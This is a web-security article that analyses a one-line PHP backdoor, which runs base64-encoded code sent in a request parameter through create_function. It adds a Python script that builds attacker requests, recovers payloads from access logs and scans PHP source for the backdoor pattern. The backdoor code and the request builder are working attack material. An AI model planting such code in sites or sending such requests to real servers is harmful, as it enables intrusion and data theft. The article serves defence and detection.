Quick Analysis of a Simple PHP Backdoor

What is a backdoor and how it works


Here’s an extremely simple analysis of a PHP Backdoor to help understand what a backdoor is and how it works.

What is a Backdoor?

A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device, or its embodiment. Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptographic systems.

To put it simply, a backdoor is a secret entry into the server (or the website in this case).

Example of a Simple PHP Backdoor

Here’s an example of a simple PHP script that allows a remote attacker to “do stuff” inside your website.

<?php
if(!empty($_REQUEST['fcb'])){$fcb=base64_decode($_REQUEST['fcb']);$fcb=create_function('',$fcb);@$fcb();exit;}

In order to understand what’s happening, let’s first format the code to make it legible.

<?php
if ( ! empty( $_REQUEST['fcb'] ) ) {           // trigger: any request carrying a non-empty 'fcb' parameter (GET, POST or cookie)
    $fcb = base64_decode( $_REQUEST['fcb'] );  // the parameter is the attacker's PHP, base64-encoded to pass cleanly through URLs and filters
    $fcb = create_function( '', $fcb );        // compile that string into an anonymous function (effectively eval)
    @$fcb();                                   // run it; the '@' hides any warnings or errors it produces
    exit;                                      // stop here so the normal page is never rendered
}

How Does This PHP Backdoor Work?

Essentially, anyone who knows the parameter name can send a base64-encoded PHP payload in a GET or POST parameter called fcb (or in a cookie of that name, since $_REQUEST merges all three).

The website accepts it, decodes it, compiles the decoded string into an anonymous function on the fly and silently executes it. create_function() is eval() with a different name, the leading @ suppresses any error output that might give the game away, and the exit afterwards means the normal page is never rendered. One caveat for anyone testing this: create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this exact sample fails on PHP 8, but the same construction with eval() works on every version.

As with most backdoors, the attacker can send any payload, and depending on the PHP configuration (disable_functions, open_basedir, and the file permissions of the web server user) can do almost anything PHP can do: read and write files, query the database with the site's own credentials, make outbound connections and run shell commands.
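The request flow described above, together with the two checks a defender would run against it, as an added example in Python that is not part of the original article. It builds the request the way the attacker would, mirrors the decode step the backdoor performs before create_function(), recovers GET payloads from constructed access-log lines, and flags PHP source that combines request input, a decoder and a dynamic-code sink. The file path, the log lines and the payload are constructed for illustration; the parameter name fcb is the one from the page.

```python
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# ---- attacker side: what a request to the backdoor looks like -------------

# Constructed payload for illustration; the backdoor runs whatever PHP it
# decodes to, this one merely prints the kernel string and working directory.
PAYLOAD_PHP = "echo php_uname(); echo getcwd();"

def craft_request(payload_php: str, path: str = "/wp-content/uploads/x.php",
                  param: str = "fcb") -> str:
    """Return the request target (path?query) an attacker would send.
    The PHP body is base64-encoded and placed in the parameter the backdoor
    reads ('fcb' on this page). The path is an assumed example location."""
    encoded = base64.b64encode(payload_php.encode()).decode()
    return f"{path}?{urlencode({param: encoded})}"

# ---- server side: what the backdoor does before create_function() ---------

def server_side_decode(target: str, param: str = "fcb") -> Optional[str]:
    """Mirror the backdoor's first two statements: take the parameter from the
    query string and base64-decode it. Returns the PHP source that would be
    compiled and executed, or None when the parameter is absent or empty."""
    values = parse_qs(urlsplit(target).query).get(param)
    if not values or not values[0]:
        return None
    return base64.b64decode(values[0]).decode(errors="replace")

# ---- defender side 1: recover payloads from web server access logs --------

# Constructed combined-format log lines (not taken from a real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?p=1 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-content/uploads/x.php?fcb=ZWNobyBwaHBfdW5hbWUoKTs%3D HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

REQUEST_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def recover_payloads(log_text: str, param: str = "fcb") -> list:
    """Decode every request whose query string carries the backdoor parameter.
    Only GET payloads are recoverable this way: POST bodies are not written to
    access logs, so for those you need a WAF/proxy capture or a full PCAP."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE_RE.search(line)
        if not m:
            continue
        php = server_side_decode(m.group("target"), param)
        if php is not None:
            hits.append((m.group("method"), php))
    return hits

# ---- defender side 2: find the same construction in PHP source ------------

REQUEST_INPUT_RE = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\s*\[")
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
DYNAMIC_SINK_RE = re.compile(r"\b(create_function|eval|assert)\s*\(")

def is_suspicious(php_source: str) -> bool:
    """Flag a file that reads request input, runs it through a decoder, and
    hands the result to a dynamic-code sink. Each feature alone is common in
    legitimate code; all three together in one file is the backdoor pattern."""
    return all(r.search(php_source) for r in (REQUEST_INPUT_RE, DECODER_RE, DYNAMIC_SINK_RE))

# Constructed inputs: the one-liner from this page, and an ordinary snippet.
BACKDOOR_SRC = ("<?php\nif(!empty($_REQUEST['fcb'])){$fcb=base64_decode($_REQUEST['fcb']);"
                "$fcb=create_function('',$fcb);@$fcb();exit;}")
BENIGN_SRC = "<?php\n$page = (int) ($_GET['p'] ?? 1);\necho render_page($page);"

if __name__ == "__main__":
    print("attacker sends :", craft_request(PAYLOAD_PHP))
    print("server executes:", server_side_decode(craft_request(PAYLOAD_PHP)))
    print("from access log:", recover_payloads(SAMPLE_LOG))
    print("scan one-liner :", is_suspicious(BACKDOOR_SRC), "| scan benign:", is_suspicious(BENIGN_SRC))
```

The source scanner is deliberately a three-feature match rather than a grep for base64_decode alone, because decoders show up in plenty of legitimate plugin code; it is request input flowing through a decoder into eval-like execution that marks a backdoor. Run it over every .php file under the web root, including uploads directories where PHP should never live at all.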

What Damage Can It Potentially Cause?

A backdoor like this can overwrite the site's index page, letting the attacker leave their mark or "deface" the site. It can also be used to brute-force FTP or cPanel credentials, gaining broader access that can end in the deletion of every file or the transfer of data to the attacker. In one case it infected about 200,000 JavaScript files with cryptomining code, so the site started mining the moment any visitor opened any of its pages. How would you clean 200,000 infected files spread over 18 GB?


This article is written by Evelyn Allison. Evelyn has over two decades of experience with the big-tech corporate giants. Starting in 2002 with consumer IT remote support, she transitioned into IT enterprise support and systems provisioning for Windows and Linux servers. Her prowess spans network security, security auditing and scripting-based automation. Actively involved in web security since 2017, Evelyn has worked with various technologies to secure the web, leveraging Nginx, ModSecurity, reverse proxies, developing web application firewalls, on-the-fly asset optimization using Google's PageSpeed Module and more. Her expertise is reflected in the top-tier plugins and comprehensive consulting services she offers in the domain of web security.